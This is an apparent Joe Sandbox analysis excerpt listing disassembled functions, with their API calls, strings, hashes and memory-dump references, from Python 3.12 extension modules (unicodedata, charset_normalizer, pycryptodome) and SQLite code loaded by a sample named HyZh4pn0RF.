Function 00007FFBAA462630 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

PyMem_Malloc.PYTHON312(?,?,00000000,00007FFBAA46256A), ref: 00007FFBAA46263B
PyCapsule_New.PYTHON312(?,?,00000000,00007FFBAA46256A), ref: 00007FFBAA462678
PyErr_NoMemory.PYTHON312(?,?,00000000,00007FFBAA46256A), ref: 00007FFBAA463ECA
PyMem_Free.PYTHON312(?,?,00000000,00007FFBAA46256A), ref: 00007FFBAA463EDA

Strings

unicodedata._ucnhash_CAPI, xrefs: 00007FFBAA46266D

Memory Dump Source

Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true

Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd

Similarity

API ID: Mem_$Capsule_Err_FreeMallocMemory
String ID: unicodedata._ucnhash_CAPI
API String ID: 3673501854-3989975041
Opcode ID: 5e9834a627ee6fe7d10ad507bd7f89f40610d90c00d7e2fed1f02445e86e63e1
Instruction ID: 8e445761433167466c78d78438bf1c940f4ccbce3b3d7f682b89d4b1815252f0
Opcode Fuzzy Hash: 5e9834a627ee6fe7d10ad507bd7f89f40610d90c00d7e2fed1f02445e86e63e1
Instruction Fuzzy Hash: D8F0F6A0E0BB82D5EA068B25E8040B863ACBF18F84B4814B5ED4E06354EE3CE0568321

Function 00007FFBAA5BC47A Relevance: 8.0, APIs: 1, Strings: 4, Instructions: 491COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140 ref: 00007FFBAA5BC8D4

Strings

string or blob too big, xrefs: 00007FFBAA5C0FB5
statement aborts at %d: [%s] %s, xrefs: 00007FFBAA5C138F
out of memory, xrefs: 00007FFBAA5C12EB
2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0, xrefs: 00007FFBAA5C0DC3, 00007FFBAA5C1120

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memcpy
String ID: 2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$out of memory$statement aborts at %d: [%s] %s$string or blob too big
API String ID: 3510742995-3617401034
Opcode ID: 1c93ec38d3358962f044fd8c9bc7468739eb095e07bda336951e211f631fe774
Instruction ID: 09ff7a664a08ddef265d42c8f93c854ec66d1ed6e77ffc49edbbbee2fee3c99e
Opcode Fuzzy Hash: 1c93ec38d3358962f044fd8c9bc7468739eb095e07bda336951e211f631fe774
Instruction Fuzzy Hash: E3327EB2A09641CAE752CF35D04026D77B9FB4AB85F104176EE4D57B98EF38E842CB18

Function 00007FFBAA5A6C30 Relevance: 7.8, APIs: 2, Strings: 3, Instructions: 311COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FFBAA5A6D44
memset.VCRUNTIME140 ref: 00007FFBAA5A6ED7

Strings

2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0, xrefs: 00007FFBAA5A7071
%s at line %d of [%.10s], xrefs: 00007FFBAA5A708A
database corruption, xrefs: 00007FFBAA5A707E

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memset
String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
API String ID: 2221118986-3418467682
Opcode ID: 4c54b21813154fb7f9f40b9b021697125c54615346db14d8ede6ea4b387c30e4
Instruction ID: dc4a1ecec625f4260173aad5eeb19898aba7af577c5ba3e8e0af36874ff825b3
Opcode Fuzzy Hash: 4c54b21813154fb7f9f40b9b021697125c54615346db14d8ede6ea4b387c30e4
Instruction Fuzzy Hash: C0D1CEB2706781C6DB52CF29E0086A9B7A8FB8AB84F058076DF4D47794DF39D842C714

Function 00007FFBAA5AA2A0 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 197COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFBAA5A8BC0: memcpy.VCRUNTIME140 ref: 00007FFBAA5A8C2C
Part of subcall function 00007FFBAA5A8BC0: memcpy.VCRUNTIME140 ref: 00007FFBAA5A8C53

memcpy.VCRUNTIME140 ref: 00007FFBAA5AA51F
memcpy.VCRUNTIME140 ref: 00007FFBAA5AA535

Strings

2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0, xrefs: 00007FFBAA5AA347
%s at line %d of [%.10s], xrefs: 00007FFBAA5AA367
database corruption, xrefs: 00007FFBAA5AA360

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memcpy
String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
API String ID: 3510742995-3418467682
Opcode ID: 86738842b0e44f20bdd99a39e3ccfa9be7d7f0e77c9da77a4efe8b00987e6719
Instruction ID: bf3dbe5852f17768e751a1e77a85f35df8459a023c024aaaf2bcaaa3b818b73a
Opcode Fuzzy Hash: 86738842b0e44f20bdd99a39e3ccfa9be7d7f0e77c9da77a4efe8b00987e6719
Instruction Fuzzy Hash: DE81EEB2709682CBE7528B39E4487AD77A9FB8AB84F008072EF4D47695DF38D446C710

Function 00007FFBAA5A7C40 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 192COMMON

Download Yara Rule

Strings

2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0, xrefs: 00007FFBAA5A7CEC
%s at line %d of [%.10s], xrefs: 00007FFBAA5A7D06
database corruption, xrefs: 00007FFBAA5A7CFF

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
API String ID: 0-3418467682
Opcode ID: 9ce377c43e4b0ac4e6995e3dcccadade6863006014a481b8dff363d14d379dd9
Instruction ID: 1eede433699570e12f462844fcbad6f7923786f47b32051817b79095bd969b21
Opcode Fuzzy Hash: 9ce377c43e4b0ac4e6995e3dcccadade6863006014a481b8dff363d14d379dd9
Instruction Fuzzy Hash: 3181E3B2B092D1DAD7228B35D5842BD7BA9FB42B44F044072DF8987681DF3CE856C764

Function 00007FFBAA61AA10 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 158stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,00000000,00007FFBAA61ACA8), ref: 00007FFBAA61AB67
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,00000000,00007FFBAA61ACA8), ref: 00007FFBAA61AB81
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,00007FFBAA61ACA8), ref: 00007FFBAA61AC18

Strings

INS, xrefs: 00007FFBAA61AB77
CRE, xrefs: 00007FFBAA61AB5D

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: strncmp$memcpy
String ID: CRE$INS
API String ID: 2549481713-4116259516
Opcode ID: d845553f261fd553dad331bcc8b4d8629e9d668a7afd0fd7406db39270ae900c
Instruction ID: 9b614ca36a7b8a6efc09ad2ca1856d50c0432441e262d18daf908ffbef294487
Opcode Fuzzy Hash: d845553f261fd553dad331bcc8b4d8629e9d668a7afd0fd7406db39270ae900c
Instruction Fuzzy Hash: 6551C2E1B0A642C1EA129B3AD9402797BA9BF60FD0F4451B6CD5D477C1DE3CE8038B20

Function 00007FFBAA5A7F40 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 152COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140 ref: 00007FFBAA5A7FC9
memmove.VCRUNTIME140 ref: 00007FFBAA5A80A5

Strings

2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0, xrefs: 00007FFBAA5A8149
%s at line %d of [%.10s], xrefs: 00007FFBAA5A8161
database corruption, xrefs: 00007FFBAA5A8155

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memcpymemmove
String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
API String ID: 167125708-3418467682
Opcode ID: 79df89aba19dc62236183e3a7e8ad1dbdae6fd8d3e4fea61fcb66bdb4a7a4a6b
Instruction ID: 4c94768a8202e2b909073d434d242a4135e821a940f106510896674c6e9f1d79
Opcode Fuzzy Hash: 79df89aba19dc62236183e3a7e8ad1dbdae6fd8d3e4fea61fcb66bdb4a7a4a6b
Instruction Fuzzy Hash: B351DCB2709BC0C5CB15CB29E4446AEBBA9F749B84F148176EF8E03754DA3CD052CB20

Function 00007FFBAB6A2ED0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

PyLong_FromSsize_t.PYTHON312 ref: 00007FFBAB6A2EFF
PyLong_FromSsize_t.PYTHON312 ref: 00007FFBAB6A2F27
PyObject_RichCompareBool.PYTHON312 ref: 00007FFBAB6A2F3E
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A2F54
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A2F68

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: DeallocFromLong_Ssize_t$BoolCompareObject_Rich
String ID:
API String ID: 4107546884-0
Opcode ID: 48720d78ba32745252a3d04257a9edec78878515a75e68daf766dae4164bca8c
Instruction ID: 8e5e0a2fb8c8e52db9b13d25cbf5d7abb504b4f49526d2666989a6cf7228a96d
Opcode Fuzzy Hash: 48720d78ba32745252a3d04257a9edec78878515a75e68daf766dae4164bca8c
Instruction Fuzzy Hash: E72130B2ACA54241EA6A4B3DDD54378A2B0AF05BB0F48A634DE3D467F4DF2CE4518700

Function 00007FFBAB6A8010 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A803C
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A8065
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A808E
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A80B7
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A80D9

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc
String ID:
API String ID: 3617616757-0
Opcode ID: 02352599f705a3241e88950aa0469c59beaf4792bcb6d3889a9a60b667567bda
Instruction ID: 86895478f92e8bf74d8db63ff65154a51fe37a21a53ecf1b127e5952d29b71f3
Opcode Fuzzy Hash: 02352599f705a3241e88950aa0469c59beaf4792bcb6d3889a9a60b667567bda
Instruction Fuzzy Hash: EE31EBB6916A0185EB564F38DC58378BAB4FB44B3DF18A338CE79511E1CF7E94858300

Function 00007FFBAB6A4990 Relevance: 7.5, APIs: 5, Instructions: 29threadCOMMON

Download Yara Rule

APIs

PyObject_GC_UnTrack.PYTHON312 ref: 00007FFBAB6A499D
_PyTrash_cond.PYTHON312 ref: 00007FFBAB6A49AF
_PyThreadState_UncheckedGet.PYTHON312 ref: 00007FFBAB6A49B9
_PyTrash_begin.PYTHON312 ref: 00007FFBAB6A49C8
_PyTrash_end.PYTHON312 ref: 00007FFBAB6A49E7

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Object_State_ThreadTrackTrash_beginTrash_condTrash_endUnchecked
String ID:
API String ID: 3074927763-0
Opcode ID: 827b1114b3bde6b7782323d29114232b68231d63ae6a03841d0d76945457bef3
Instruction ID: 7c393da1d8e515b21262657eb187ea74a479e2315e863f35675214e5ea2608d4
Opcode Fuzzy Hash: 827b1114b3bde6b7782323d29114232b68231d63ae6a03841d0d76945457bef3
Instruction Fuzzy Hash: 39F0F9B5A0A64281EE465BBAED95279A371BF48FD5B48E034CE3E07624DE2CD4A58200

Function 00007FFBAB6A6AB0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A6ADA

Strings

interpreted classes cannot inherit from compiled, xrefs: 00007FFBAB6A6AD0
__init__, xrefs: 00007FFBAB6A6B19, 00007FFBAB6A6BEC
charset_normalizer.md.SuperWeirdWordPlugin, xrefs: 00007FFBAB6A6BD9

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: __init__$charset_normalizer.md.SuperWeirdWordPlugin$interpreted classes cannot inherit from compiled
API String ID: 1450464846-371468285
Opcode ID: 98918f0986896f26525c7bd9e5b43f4031bd6749c4d76523467727f76d4c2467
Instruction ID: ec20faa2b1331700234c69e4689e594709e6db2622ee90df762018791a675f97
Opcode Fuzzy Hash: 98918f0986896f26525c7bd9e5b43f4031bd6749c4d76523467727f76d4c2467
Instruction Fuzzy Hash: 914114B2A0AB0181EB16CF69E840369B3B4FB48B88F549135CE6C47368EF79E495C340

Function 00007FFBAB6A7E10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A7E3A

Strings

interpreted classes cannot inherit from compiled, xrefs: 00007FFBAB6A7E30
__init__, xrefs: 00007FFBAB6A7E75, 00007FFBAB6A7F3A
charset_normalizer.md.ArchaicUpperLowerPlugin, xrefs: 00007FFBAB6A7F27

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: __init__$charset_normalizer.md.ArchaicUpperLowerPlugin$interpreted classes cannot inherit from compiled
API String ID: 1450464846-353558827
Opcode ID: d9e477cc0f5dbe889ee029430d6b8f0b420a3cfa5d140793ed0a56d7501aa99d
Instruction ID: 5aff50d4a99572dda8ea501858b098471e92969d8c0f15e9f4361fd06b0559e3
Opcode Fuzzy Hash: d9e477cc0f5dbe889ee029430d6b8f0b420a3cfa5d140793ed0a56d7501aa99d
Instruction Fuzzy Hash: DA314DB260AA4185EB428F3DE8503A9B3B4FB48B88F54A435CE6C47369EF7DE554C340

Function 00007FFBAB6A4AB0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 75COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A4ADA

Strings

interpreted classes cannot inherit from compiled, xrefs: 00007FFBAB6A4AD0
__init__, xrefs: 00007FFBAB6A4B19, 00007FFBAB6A4BC2
charset_normalizer.md.TooManySymbolOrPunctuationPlugin, xrefs: 00007FFBAB6A4BAF

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: __init__$charset_normalizer.md.TooManySymbolOrPunctuationPlugin$interpreted classes cannot inherit from compiled
API String ID: 1450464846-3280324660
Opcode ID: a1ddc10de017addce63480acb8cb0cb49846706b3ca5f678430c59beec134696
Instruction ID: 9ea68e2d30f8bc98726af9de20a06ea1264200c2bf2ae2e815b8cd8f43760255
Opcode Fuzzy Hash: a1ddc10de017addce63480acb8cb0cb49846706b3ca5f678430c59beec134696
Instruction Fuzzy Hash: 1A3139B1A0AA0285EB528F79EC503A9B3B4FB48B88F549435CE6C47365DF3DE451C740

Function 00007FFBAB6A5E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A5E4A

Strings

charset_normalizer.md.SuspiciousDuplicateAccentPlugin, xrefs: 00007FFBAB6A5F0B
interpreted classes cannot inherit from compiled, xrefs: 00007FFBAB6A5E40
__init__, xrefs: 00007FFBAB6A5E89, 00007FFBAB6A5F1E

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: __init__$charset_normalizer.md.SuspiciousDuplicateAccentPlugin$interpreted classes cannot inherit from compiled
API String ID: 1450464846-1506521901
Opcode ID: c9011ee015d9b478a68b666d2386e0bc45b2be7c5bf24e43dd3277610430b050
Instruction ID: e42feacde00e243e197c276d6ef8abe799841fe5f0cd3795f6087bc3db95a2ac
Opcode Fuzzy Hash: c9011ee015d9b478a68b666d2386e0bc45b2be7c5bf24e43dd3277610430b050
Instruction Fuzzy Hash: CE313BB1A1AA0285EB42CF2DE8502A9B3B0FB48B88F949435CE6C47774EF3DE551C740

Function 00007FFBAB6A6560 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A658A

Strings

interpreted classes cannot inherit from compiled, xrefs: 00007FFBAB6A6580
__init__, xrefs: 00007FFBAB6A65C9, 00007FFBAB6A665E
charset_normalizer.md.SuspiciousRange, xrefs: 00007FFBAB6A664B

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: __init__$charset_normalizer.md.SuspiciousRange$interpreted classes cannot inherit from compiled
API String ID: 1450464846-880397153
Opcode ID: 49407b564c236b4001e082ae6d16e11313c9b7c79a02ae8e4e4803c904df55db
Instruction ID: 33f5db7f46a5046e6bf55f09164be9c812790a463eda00e0e403106042091c6d
Opcode Fuzzy Hash: 49407b564c236b4001e082ae6d16e11313c9b7c79a02ae8e4e4803c904df55db
Instruction Fuzzy Hash: 20313CB1A0AA0285EB428F7DEC502A5A3B0FB48B88F94A535CE6C47774EF3DE451C340

Function 00007FFBAB662460 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

_wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBAB6624A4
memcpy.VCRUNTIME140 ref: 00007FFBAB6624DF

Strings

D:\a\pycryptodome\pycryptodome\src\hash_SHA2_template.c, xrefs: 00007FFBAB662496
hs->curlen < BLOCK_SIZE, xrefs: 00007FFBAB66249D

Memory Dump Source

Source File: 00000002.00000002.1836922455.00007FFBAB661000.00000020.00000001.01000000.00000024.sdmp, Offset: 00007FFBAB660000, based on PE: true

Associated: 00000002.00000002.1836892940.00007FFBAB660000.00000002.00000001.01000000.00000024.sdmpDownload File
Associated: 00000002.00000002.1836950286.00007FFBAB665000.00000002.00000001.01000000.00000024.sdmpDownload File
Associated: 00000002.00000002.1836978076.00007FFBAB666000.00000004.00000001.01000000.00000024.sdmpDownload File
Associated: 00000002.00000002.1837005009.00007FFBAB667000.00000002.00000001.01000000.00000024.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab660000_HyZh4pn0RF.jbxd

Similarity

API ID: _wassertmemcpy
String ID: D:\a\pycryptodome\pycryptodome\src\hash_SHA2_template.c$hs->curlen < BLOCK_SIZE
API String ID: 785382960-3286700114
Opcode ID: 8e307c5d76f5c296c65b880e1eedf86098b3d88c76ad4ba263cbc005006bb698
Instruction ID: 8d27b51fddba9e3c659734cf332b2c230e59ee32742a9269aa00327091013055
Opcode Fuzzy Hash: 8e307c5d76f5c296c65b880e1eedf86098b3d88c76ad4ba263cbc005006bb698
Instruction Fuzzy Hash: FD21E9B2B0965187EB5D9F29E474168E360FB56B88F14A039DE1A07F69CB3CD841C700

Function 00007FFBAB6A8A10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A8A3A

Strings

interpreted classes cannot inherit from compiled, xrefs: 00007FFBAB6A8A30
__init__, xrefs: 00007FFBAB6A8A79, 00007FFBAB6A8AFA
